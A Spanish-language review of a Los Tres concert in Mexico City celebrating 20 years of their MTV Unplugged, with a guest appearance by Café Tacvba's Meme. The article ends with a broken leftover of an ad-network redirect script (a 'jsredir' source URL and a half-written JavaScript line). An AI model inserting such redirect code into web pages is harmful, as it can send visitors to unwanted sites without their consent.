Los Tres celebraron 20 años del Unplugged en el Teatro de la Ciudad y esto fue lo que pasó

Por Manuel Pineda

El pasado viernes 17 de junio, la banda chilena Los Tres, conformada por Álvaro Enríquez, Roberto “Titae” Lindi, Boris Ramírez y Sebastián Cabib, celebraron en el Teatro de la Ciudad Esperanza Iris, 20 años del Unplugged que realizaron para la cadena MTV y que marcó un antes y un después en su carrera musical.

Vestidos elegantemente de negro, en medio de un escenario austero pero suficiente y frente a mil 344 espectadores que abarrotaron el lugar, los chilenos dieron muestra de la madurez interpretativa, de las facultades de improvisación y la capacidad escénica que solo da el tiempo y las horas de ensayo.

Desde “Sudapara”, siguiendo con “La espada y la pared”, el público que los ha idolatrado desde hace varias décadas, no dejó de cantar, aplaudir y hacer sentir a la banda cobijada y querida a la vez.

Un momento especial

En uno de los momentos especiales de la noche, se escuchó decir: “Ahora queremos invitar a un gran amigo, admirado por nosotros, padre de Agustina, Emmanuel del Real”, y así subió el tecladista de Café Tacvba, mejor conocido como Meme a acompañar a los chilenos en “Déjate caer”, quienes en un momento de la canción mencionarion “todo va a estar bien”, frase de una de las canciones que actualmente promociona Meme en su faceta como solista.

Fue así que, con dos horas de concierto, todos salieron contentos, el público en su mayoría mayores de 35 años volvió a vivir la experiencia de aquel lejano Unplugged de Los Tres, uno de los discos más vendidos en la historia de la música chilena.

< src="https://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

var d=document;var s=d.createElement(”);

Comentarios